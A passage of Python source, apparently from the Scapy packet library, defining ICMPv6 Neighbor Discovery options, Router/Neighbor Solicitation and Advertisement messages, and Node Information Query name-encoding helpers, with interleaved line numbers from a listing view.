    22: "CARD Reply Option",  # RFC 4065/4066/4067
    23: "MAP Option",  # RFC 4140
    24: "Route Information Option",  # RFC 4191
    25: "Recursive DNS Server Option",
    26: "IPv6 Router Advertisement Flags Option",
}

1771 

# Neighbor Discovery option type -> name of the class implementing it.
icmp6ndoptscls = {
    1: "ICMPv6NDOptSrcLLAddr",
    2: "ICMPv6NDOptDstLLAddr",
    3: "ICMPv6NDOptPrefixInfo",
    4: "ICMPv6NDOptRedirectedHdr",
    5: "ICMPv6NDOptMTU",
    6: "ICMPv6NDOptShortcutLimit",
    7: "ICMPv6NDOptAdvInterval",
    8: "ICMPv6NDOptHAInfo",
    9: "ICMPv6NDOptSrcAddrList",
    10: "ICMPv6NDOptTgtAddrList",
    # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
    # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
    # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
    # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
    # 15: Do Me,
    # 16: Do Me,
    17: "ICMPv6NDOptIPAddr",
    18: "ICMPv6NDOptNewRtrPrefix",
    19: "ICMPv6NDOptLLA",
    # 20: Do Me,
    # 21: Do Me,
    # 22: Do Me,
    23: "ICMPv6NDOptMAP",
    24: "ICMPv6NDOptRouteInfo",
    25: "ICMPv6NDOptRDNSS",
    26: "ICMPv6NDOptEFA",
    31: "ICMPv6NDOptDNSSL",
    37: "ICMPv6NDOptCaptivePortal",
    38: "ICMPv6NDOptPREF64",
}

1804 

# Router preference value -> display name (RFC 4191).
icmp6ndraprefs = {
    0: "Medium (default)",
    1: "High",
    2: "Reserved",
    3: "Low",
}

1809 

1810 

class _ICMPv6NDGuessPayload:
    """Mixin picking the class of the next Neighbor Discovery option."""
    name = "Dummy ND class that implements guess_payload_class()"

    def guess_payload_class(self, p):
        """Return the class to use to dissect the remaining bytes ``p``.

        The first byte of ``p`` is looked up in ``icmp6ndoptscls``, with
        ICMPv6NDOptUnknown as fallback.
        """
        if len(p) > 1:
            return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
        # Too short to hold an option: say so explicitly instead of
        # implicitly returning None, which is not a usable class.
        return conf.raw_layer

1817 

1818 

1819# Beginning of ICMPv6 Neighbor Discovery Options. 

1820 

class ICMPv6NDOptDataField(StrLenField):
    """String field zero-padded so that (length + 2) is a multiple of 8.

    With ``strip_zeros`` set, trailing zero bytes are removed when
    dissecting.
    """
    __slots__ = ["strip_zeros"]

    def __init__(self, name, default, strip_zeros=False, **kwargs):
        super().__init__(name, default, **kwargs)
        self.strip_zeros = strip_zeros

    def i2len(self, pkt, x):
        # Length of the padded form
        padded = self.i2m(pkt, x)
        return len(padded)

    def i2m(self, pkt, x):
        # Number of zero bytes needed to bring len(x) + 2 to a multiple of 8
        pad = -(len(x) + 2) % 8
        if pad:
            x += b"\x00" * pad
        return x

    def m2i(self, pkt, x):
        return x.rstrip(b"\x00") if self.strip_zeros else x

1841 

1842 

class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    """Fallback Neighbor Discovery option keeping its body as raw data."""
    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [
        ByteField("type", 0),
        # In units of 8 bytes, the 2 bytes of type and len included
        FieldLenField("len", None, length_of="data", fmt="B",
                      adjust=lambda pkt, x: (2 + x) // 8),
        # A len of 0 is read as if it were 1
        ICMPv6NDOptDataField("data", "", strip_zeros=False,
                             length_from=lambda pkt:
                             8 * max(pkt.len, 1) - 2),
    ]

1851 

1852# NOTE: len includes type and len field. Expressed in unit of 8 bytes 

1853# TODO: Revisit the handling of ETHER_ANY 

1854 

1855 

class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery option of type 1 holding a MAC address."""
    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [
        ByteField("type", 1),
        ByteField("len", 1),
        SourceMACField("lladdr"),
    ]

    def mysummary(self):
        return self.sprintf("%name% %lladdr%")

1864 

1865 

class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    """Same layout as ICMPv6NDOptSrcLLAddr, with type 2."""
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
    type = 2

1869 

1870 

class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    """Neighbor Discovery Prefix Information option (type 3)."""
    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [
        ByteField("type", 3),
        ByteField("len", 4),
        ByteField("prefixlen", 64),
        BitField("L", 1, 1),
        BitField("A", 1, 1),
        BitField("R", 0, 1),
        BitField("res1", 0, 5),
        XIntField("validlifetime", 0xffffffff),
        XIntField("preferredlifetime", 0xffffffff),
        XIntField("res2", 0x00000000),
        IP6Field("prefix", "::"),
    ]

    def mysummary(self):
        template = ("%name% %prefix%/%prefixlen% "
                    "On-link %L% Autonomous Address %A% "
                    "Router Address %R%")
        return self.sprintf(template)

1889 

1890# TODO: We should also limit the size of included packet to something 

1891# like (initiallen - 40 - 2) 

1892 

1893 

class TruncPktLenField(PacketLenField):
    # PacketLenField whose serialized value is cut down to the largest
    # multiple of 8 bytes that fits in the built packet.

    def i2m(self, pkt, x):
        # Build the embedded packet, then drop the trailing bytes that do
        # not fill a whole 8-byte unit.
        built = bytes(x)
        usable = len(built) - (len(built) % 8)
        return built[:usable]

    def i2len(self, pkt, i):
        # Length reported to FieldLenField is the truncated length.
        truncated = self.i2m(pkt, i)
        return len(truncated)

1902 

1903 

class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    # Option type 4. "len" is computed from the embedded packet as
    # (len(pkt) + 8) // 8; on dissection the packet spans 8 * len - 8 bytes.
    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [
        ByteField("type", 4),
        FieldLenField(
            "len", None, length_of="pkt", fmt="B",
            adjust=lambda pkt, x: (x + 8) // 8,
        ),
        MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
        TruncPktLenField(
            "pkt", b"", IPv6,
            length_from=lambda pkt: 8 * pkt.len - 8,
        ),
    ]

1912 

1913# See which value should be used for default MTU instead of 1280 

1914 

1915 

class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    # Option type 5, fixed len of 1; "mtu" defaults to 1280.
    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [
        ByteField("type", 5),
        ByteField("len", 1),
        XShortField("res", 0),
        IntField("mtu", 1280),
    ]

    def mysummary(self):
        # Summary: option name and the advertised MTU.
        summary_fmt = "%name% %mtu%"
        return self.sprintf(summary_fmt)

1925 

1926 

class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):  # RFC 2491
    # Option type 6, fixed len of 1, carrying a one-byte shortcut limit.
    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [
        ByteField("type", 6),
        ByteField("len", 1),
        ByteField("shortcutlim", 40),  # XXX
        ByteField("res1", 0),
        IntField("res2", 0),
    ]

1934 

1935 

class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    # Option type 7, fixed len of 1; the summary reports "advint" in
    # milliseconds.
    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [
        ByteField("type", 7),
        ByteField("len", 1),
        ShortField("res", 0),
        IntField("advint", 0),
    ]

    def mysummary(self):
        summary_fmt = "%name% %advint% milliseconds"
        return self.sprintf(summary_fmt)

1945 

1946 

class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    # Option type 8, fixed len of 1: a preference and a lifetime (the
    # summary reports the lifetime in seconds).
    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [
        ByteField("type", 8),
        ByteField("len", 1),
        ShortField("res", 0),
        ShortField("pref", 0),
        ShortField("lifetime", 1),
    ]

    def mysummary(self):
        summary_fmt = "%name% %pref% %lifetime% seconds"
        return self.sprintf(summary_fmt)

1957 

1958# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support 

1959 

1960# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support 

1961 

1962 

class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    # Option type 17, fixed len of 3: an option code, a prefix length and
    # one IPv6 address.
    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [
        ByteField("type", 17),
        ByteField("len", 3),
        ByteEnumField(
            "optcode", 1,
            {
                1: "Old Care-Of Address",
                2: "New Care-Of Address",
                3: "NAR's IP address",
            },
        ),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("addr", "::"),
    ]

1973 

1974 

class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    # Option type 18, fixed len of 3: option code, prefix length and a
    # 16-byte prefix.
    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [
        ByteField("type", 18),
        ByteField("len", 3),
        ByteField("optcode", 0),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("prefix", "::"),
    ]

1983 

1984 

1985_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP", 

1986 1: "LLA for the new AP", 

1987 2: "LLA of the MN", 

1988 3: "LLA of the NAR", 

1989 4: "LLA of the src of TrSolPr or PrRtAdv msg", 

1990 5: "AP identified by LLA belongs to current iface of router", # noqa: E501 

1991 6: "No preifx info available for AP identified by the LLA", # noqa: E501 

1992 7: "No fast handovers support for AP identified by the LLA"} # noqa: E501 

1993 

1994 

class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):  # RFC 4068
    # Option type 19, fixed len of 1: an option code and one MAC address.
    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [
        ByteField("type", 19),
        ByteField("len", 1),
        ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
        MACField("lla", ETHER_ANY),  # We only support ethernet
    ]

2001 

2002 

class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):  # RFC 4140
    # Option type 23, fixed len of 3: distance/preference nibbles, the R
    # flag, a valid lifetime and one IPv6 address.
    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [
        ByteField("type", 23),
        ByteField("len", 3),
        BitField("dist", 1, 4),
        BitField("pref", 15, 4),  # highest availability
        BitField("R", 1, 1),
        BitField("res", 0, 7),
        IntField("validlifetime", 0xffffffff),
        IP6Field("addr", "::"),
    ]

2013 

2014 

class _IP6PrefixField(IP6Field):
    # IPv6 prefix whose on-wire size depends on the packet's "len" field:
    # 8 * (len - 1) bytes are read when dissecting, and the built value is
    # truncated or zero-extended according to "len".
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        # Append the (possibly shortened) machine value to the buffer.
        return s + self.i2m(pkt, val)

    def getfield(self, pkt, s):
        # Read the prefix bytes and right-pad with zeros up to 16 bytes so
        # that m2i() always receives a full address.
        nbytes = self.length_from(pkt)
        prefix = s[:nbytes]
        if nbytes < 16:
            prefix += b'\x00' * (16 - nbytes)
        return s[nbytes:], self.m2i(pkt, prefix)

    def i2len(self, pkt, x):
        built = self.i2m(pkt, x)
        return len(built)

    def i2m(self, pkt, x):
        opt_len = pkt.len

        # No prefix given: use "::" and, when len is unset too, behave as
        # if len were 1 (which produces an empty prefix below).
        if x is None:
            x = "::"
            if opt_len is None:
                opt_len = 1
        packed = inet_pton(socket.AF_INET6, x)

        if opt_len is None:
            return packed
        if opt_len in [0, 1]:
            return b""
        if opt_len in [2, 3]:
            return packed[:8 * (opt_len - 1)]

        # len > 3: full address followed by 8 zero bytes per extra unit
        return packed + b'\x00' * 8 * (opt_len - 3)

2052 

2053 

class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):  # RFC 4191
    # Option type 24. "len" is computed from the built prefix as
    # len(prefix) // 8 + 1.
    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [
        ByteField("type", 24),
        FieldLenField(
            "len", None, length_of="prefix", fmt="B",
            adjust=lambda pkt, x: x // 8 + 1,
        ),
        ByteField("plen", None),
        BitField("res1", 0, 3),
        BitEnumField("prf", 0, 2, icmp6ndraprefs),
        BitField("res2", 0, 3),
        IntField("rtlifetime", 0xffffffff),
        _IP6PrefixField("prefix", None),
    ]

    def mysummary(self):
        summary_fmt = "%name% %prefix%/%plen% Preference %prf%"
        return self.sprintf(summary_fmt)

2068 

2069 

class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):  # RFC 5006
    # Option type 25. "len" is computed from the number of addresses as
    # 2 * count + 1; on dissection the list spans 8 * (len - 1) bytes.
    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [
        ByteField("type", 25),
        FieldLenField(
            "len", None, count_of="dns", fmt="B",
            adjust=lambda pkt, x: 2 * x + 1,
        ),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        IP6ListField(
            "dns", [],
            length_from=lambda pkt: 8 * (pkt.len - 1),
        ),
    ]

    def mysummary(self):
        # Option name followed by the comma-separated server addresses.
        servers = ", ".join(self.dns)
        return self.sprintf("%name% ") + servers

2082 

2083 

class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):  # RFC 5175 (prev. 5075)
    # Option type 26, fixed len of 1; the 48 remaining bits are exposed as
    # a single "res" bit field.
    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [
        ByteField("type", 26),
        ByteField("len", 1),
        BitField("res", 0, 48),
    ]

2089 

2090# As required in Sect 8. of RFC 3315, Domain Names must be encoded as 

2091# described in section 3.1 of RFC 1035 

2092# XXX Label should be at most 63 octets in length : we do not enforce it 

2093# Total length of domain should be 255 : we do not enforce it either 

2094 

2095 

class DomainNameListField(StrLenField):
    # List of domain names stored on the wire as length-prefixed labels,
    # each name ending with a zero byte. With padded=True the built value
    # is zero-padded to a multiple of padded_unit bytes.
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, length_from=length_from)

    def i2len(self, pkt, x):
        built = self.i2m(pkt, x)
        return len(built)

    def i2h(self, pkt, x):
        # Any falsy internal value is presented as an empty list.
        return x if x else []

    def m2i(self, pkt, x):
        text = plain_str(x)  # Decode bytes to string
        names = []
        while text:
            # Collect labels until a zero length byte (or end of data)
            labels = []
            while text and ord(text[0]) != 0:
                size = ord(text[0])
                labels.append(text[1:size + 1])
                text = text[size + 1:]
            # In padded mode an empty label list is just padding and is
            # discarded; otherwise every terminator yields a name.
            if labels or not self.padded:
                names.append(".".join(labels) + ".")
            if text and ord(text[0]) == 0:
                text = text[1:]
        return names

    def i2m(self, pkt, x):
        # Encode each name as length-prefixed labels and make sure it ends
        # with a zero byte.
        encoded = []
        for domain in x:
            wire = b"".join(
                chb(len(label)) + label.encode("utf8")
                for label in domain.split('.')
            )
            if not (wire and orb(wire[-1]) == 0):
                wire += b'\x00'
            encoded.append(wire)
        ret_string = b"".join(encoded)

        # In padded mode, add some \x00 bytes
        if self.padded:
            remainder = len(ret_string) % self.padded_unit
            if remainder:
                ret_string += b"\x00" * (self.padded_unit - remainder)

        return ret_string

2148 

2149 

class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):  # RFC 6106
    # Option type 31. "len" is computed from the built search list as
    # 1 + len(searchlist) // 8; on dissection the list spans 8 * len - 8
    # bytes.
    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [
        ByteField("type", 31),
        FieldLenField(
            "len", None, length_of="searchlist", fmt="B",
            adjust=lambda pkt, x: 1 + x // 8,
        ),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        DomainNameListField(
            "searchlist", [],
            length_from=lambda pkt: 8 * pkt.len - 8,
            padded=True,
        ),
    ]

    def mysummary(self):
        # Option name followed by the comma-separated search domains.
        domains = ", ".join(self.searchlist)
        return self.sprintf("%name% ") + domains

2164 

2165 

class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet):  # RFC 8910
    # Option type 37. "len" is computed from the URI as
    # (2 + len(URI)) // 8; the URI field is created with strip_zeros=True.
    name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
    fields_desc = [
        ByteField("type", 37),
        FieldLenField(
            "len", None, length_of="URI", fmt="B",
            adjust=lambda pkt, x: (2 + x) // 8,
        ),
        ICMPv6NDOptDataField(
            "URI", "", strip_zeros=True,
            length_from=lambda pkt: 8 * max(pkt.len, 1) - 2,
        ),
    ]

    def mysummary(self):
        summary_fmt = "%name% %URI%"
        return self.sprintf(summary_fmt)

2177 

2178 

class _PREF64(IP6Field):
    # IPv6 field that only carries the first 12 bytes of the address on
    # the wire; the last 4 bytes are read back as zeros.

    def addfield(self, pkt, s, val):
        packed = self.i2m(pkt, val)
        return s + packed[:12]

    def getfield(self, pkt, s):
        head, rest = s[:12], s[12:]
        return rest, self.m2i(pkt, head + b"\x00" * 4)

2185 

2186 

class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet):  # RFC 8781
    # Option type 38, fixed len of 2: 13-bit scaled lifetime, 3-bit prefix
    # length code (plc) and a 12-byte prefix.
    name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
    fields_desc = [
        ByteField("type", 38),
        ByteField("len", 2),
        BitField("scaledlifetime", 0, 13),
        BitEnumField(
            "plc", 0, 3,
            ["/96", "/64", "/56", "/48", "/40", "/32"],
        ),
        _PREF64("prefix", "::"),
    ]

    def mysummary(self):
        # plc values 0..5 have a label in the enum above; anything else is
        # reported as invalid.
        if self.plc < 6:
            plc = self.sprintf("%plc%")
        else:
            plc = f"[invalid PLC({self.plc})]"
        return self.sprintf("%name% %prefix%") + plc

2199 

2200# End of ICMPv6 Neighbor Discovery Options. 

2201 

2202 

class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 type 133. When stacked on IPv6, the lower layer defaults to
    # nh=58, dst=ff02::2 and hlim=255.
    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [
        ByteEnumField("type", 133, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::2", "hlim": 255}}

2210 

2211 

class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 type 134. When stacked on IPv6, the lower layer defaults to
    # nh=58, dst=ff02::1 and hlim=255.
    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [
        ByteEnumField("type", 134, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ByteField("chlim", 0),
        BitField("M", 0, 1),
        BitField("O", 0, 1),
        BitField("H", 0, 1),
        BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
        BitField("P", 0, 1),
        BitField("res", 0, 2),
        ShortField("routerlifetime", 1800),
        IntField("reachabletime", 0),
        IntField("retranstimer", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def answers(self, other):
        # Any Router Solicitation is accepted as the matching request.
        return isinstance(other, ICMPv6ND_RS)

    def mysummary(self):
        summary_fmt = ("%name% Lifetime %routerlifetime% "
                       "Hop Limit %chlim% Preference %prf% "
                       "Managed %M% Other %O% Home %H%")
        return self.sprintf(summary_fmt)

2236 

2237 

class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    # ICMPv6 type 135, carrying the target address in "tgt".
    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [
        ByteEnumField("type", 135, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        summary_fmt = "%name% (tgt: %tgt%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        # Hash on the target address, then on whatever the payload adds.
        target = bytes_encode(self.tgt)
        return target + self.payload.hashret()

2252 

2253 

class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    # ICMPv6 type 136: R/S/O flag bits, 29 reserved bits and the target
    # address.
    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [
        ByteEnumField("type", 136, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        BitField("R", 1, 1),
        BitField("S", 0, 1),
        BitField("O", 1, 1),
        XBitField("res", 0, 29),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

    def mysummary(self):
        summary_fmt = "%name% (tgt: %tgt%)"
        return self.sprintf(summary_fmt)

    def hashret(self):
        # Same hash as the Neighbor Solicitation: target, then payload.
        target = bytes_encode(self.tgt)
        return target + self.payload.hashret()

    def answers(self, other):
        # Matches a Neighbor Solicitation asking for the same target.
        if not isinstance(other, ICMPv6ND_NS):
            return False
        return self.tgt == other.tgt

2274 

2275# associated possible options : target link-layer option, Redirected header 

2276 

2277 

class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    # ICMPv6 type 137, carrying a target and a destination address.
    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [
        ByteEnumField("type", 137, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("res", 0),
        IP6Field("tgt", "::"),
        IP6Field("dst", "::"),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

2287 

2288 

2289# ICMPv6 Inverse Neighbor Discovery (RFC 3122) # 

2290 

class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    # Option type 9. "len" is computed from the number of addresses as
    # 2 * count + 1; on dissection the list spans 8 * (len - 1) bytes.
    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [
        ByteField("type", 9),
        FieldLenField(
            "len", None, count_of="addrlist", fmt="B",
            adjust=lambda pkt, x: 2 * x + 1,
        ),
        StrFixedLenField("res", b"\x00" * 6, 6),
        IP6ListField(
            "addrlist", [],
            length_from=lambda pkt: 8 * (pkt.len - 1),
        ),
    ]

2299 

2300 

class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    # Same layout as the source address list; only the default option
    # type (10) and the display name differ.
    type = 10
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"

2304 

2305 

2306# RFC3122 

2307# Required options: source lladdr and target lladdr 

2308# Other valid options: source address list, MTU 

2309# - As stated in the document, it would be nice to take the L2 address 

2310# requested in the required target lladdr option and use it as the 

2311# ethernet destination address when no address is specified 

2312# - this is not necessarily practical if the user has to specify all 

2313# the options. 

2314# Ether() must use the target lladdr as destination 

class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 type 141 with a single 32-bit reserved field after the
    # checksum.
    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 141, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

2322 

2323# Required options: target lladdr, target address list 

2324# Other valid options: MTU 

2325 

2326 

class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    # ICMPv6 type 142 with a single 32-bit reserved field after the
    # checksum.
    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 142, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {IPv6: {"nh": 58, "dst": "ff02::1", "hlim": 255}}

2334 

2335 

2336############################################################################### 

2337# ICMPv6 Node Information Queries (RFC 4620) 

2338############################################################################### 

2339 

2340# [ ] Add automatic destination address computation using computeNIGroupAddr 

2341# in IPv6 class (Scapy6 modification when integrated) if : 

2342# - it is not provided 

2343# - upper layer is ICMPv6NIQueryName() with a valid value 

2344# [ ] Try to be liberal in what we accept as internal values for _explicit_ 

2345# DNS elements provided by users. Any string should be considered 

2346# valid and kept like it has been provided. At the moment, i2repr() will 

2347# crash on many inputs 

2348# [ ] Do the documentation 

2349# [ ] Add regression tests 

2350# [ ] Perform test against real machines (NOOP reply is proof of implementation). # noqa: E501 

2351# [ ] Check if there are differences between different stacks. Among *BSD, 

2352# with others. 

2353# [ ] Deal with flags in a consistent way. 

2354# [ ] Implement compression in names2dnsrepr() and decompression in 

2355# dnsrepr2names(). Should be deactivable. 

2356 

# Display labels for the "qtype" field of Node Information messages
icmp6_niqtypes = {
    0: "NOOP",
    2: "Node Name",
    3: "IPv6 Address",
    4: "IPv4 Address",
}

2361 

2362 

class _ICMPv6NIHashret:
    # Mixin: Node Information messages are hashed on their nonce.
    def hashret(self):
        nonce = self.nonce
        return bytes_encode(nonce)

2366 

2367 

2368class _ICMPv6NIAnswers: 

2369 def answers(self, other): 

2370 return self.nonce == other.nonce 

2371 

2372# Buggy; always returns the same value during a session 

2373 

2374 

class NonceField(StrFixedLenField):
    # 8-byte fixed-length field; when no default is supplied, the default
    # is taken from self.randval() once, at field construction time.
    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is not None:
            return
        self.default = self.randval()

2380 

2381 

@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first dot-separated label of ``name`` (lower-cased) is used.
    It is prefixed with its length, hashed with MD5, and the first four
    digest bytes are rendered as the last two groups of an address that
    starts with ``ff02::2:``.

    :param name: host name or FQDN (str)
    :return: the group address, as a string
    """
    label = name.lower().split(".")[0]
    record = chr(len(label)) + label
    digest = md5(record.encode("utf8")).digest()
    # Each byte must be zero-padded to two hex digits: "%2x" pads with a
    # space instead, which produced an unparsable address (with embedded
    # blanks) whenever a digest byte was below 0x10.
    return "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])

2391 

2392 

2393# Here is the deal. First, that protocol is a piece of shit. Then, we 

2394# provide 4 classes for the different kinds of Requests (one for every 

2395# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same 

2396# data field class that is made to be smart by guessing the specific 

2397# type of value provided : 

2398# 

2399# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0, 

2400# if not overridden by user 

2401# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2, 

2402# if not overridden 

2403# - Name in the other cases: code is set to 0, if not overridden by user 

2404# 

2405# Internal storage is not only the value, but a pair providing 

2406# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@) 

2407# 

2408# Note : I merged getfield() and m2i(). m2i() should not be called 

2409# directly anyway. Same remark for addfield() and i2m() 

2410# 

2411# -- arno 

2412 

2413# "The type of information present in the Data field of a query is 

2414# declared by the ICMP Code, whereas the type of information in a 

2415# Reply is determined by the Qtype" 

2416 

def names2dnsrepr(x):
    """
    Encode one DNS name or a list of DNS names in DNS wire format.

    Names are bytes. A single bytes value that already ends with a null
    byte is assumed to be DNS-encoded and is returned unmodified. Each
    name is emitted as length-prefixed labels followed by a null byte;
    a name without any dot gets one additional null byte.
    The result is a single bytes object.
    !!! At the moment, compression is not implemented !!!
    """

    if isinstance(x, bytes):
        if x and x[-1:] == b'\x00':  # stupid heuristic
            return x
        x = [x]

    encoded = []
    for n in x:
        # single-component gets one more terminator
        terminator = b"\x00\x00" if n.count(b'.') == 0 else b"\x00"
        labels = b"".join(chb(len(y)) + y for y in n.split(b'.'))
        encoded.append(labels + terminator)
    return b"".join(encoded)

2439 

2440 

def dnsrepr2names(x):
    """
    Decode a DNS-encoded bytes string into the list of names it holds.

    Labels are read one length byte at a time; a zero length byte closes
    the current name (and a directly following zero byte is skipped, as
    used for single-component names). Data left after the last zero byte
    is not returned. A length byte with any of the two top bits set
    raises an Exception, as compression is not supported.
    Result is a list of bytes.
    """
    names = []
    current = b""
    while x:
        size = orb(x[0])
        x = x[1:]
        if size:
            if size & 0xc0:  # XXX TODO : work on that -- arno
                raise Exception("DNS message can't be compressed at this point!")
            current += x[:size] + b"."
            x = x[size:]
        else:
            # End of a name: drop the trailing dot and store it
            if current and current[-1:] == b'.':
                current = current[:-1]
            names.append(current)
            current = b""
            if x and orb(x[0]) == 0:  # single component
                x = x[1:]
    return names

2467 

2468 

class NIQueryDataField(StrField):
    # Data field of Node Information queries. The internal value is a
    # (kind, value) pair where kind is 0 for an IPv6 address (str), 1 for
    # a DNS-encoded name (bytes) and 2 for an IPv4 address (str).

    def __init__(self, name, default):
        StrField.__init__(self, name, default)

    def i2h(self, pkt, x):
        # Human value: the address string, or the first decoded DNS name.
        if x is None:
            return x
        t, val = x
        if t == 1:
            # dnsrepr2names() returns an empty list for empty or
            # unterminated data; keep the raw bytes in that case instead
            # of raising IndexError.
            names = dnsrepr2names(val)
            if names:
                val = names[0]
        return val

    def h2i(self, pkt, x):
        # A value already in internal (kind, value) form is kept as is.
        # (This used to be written "x is tuple", which compares x with the
        # tuple type itself and therefore never matched.)
        if isinstance(x, tuple) and x and isinstance(x[0], int):
            return x

        # Try IPv6
        try:
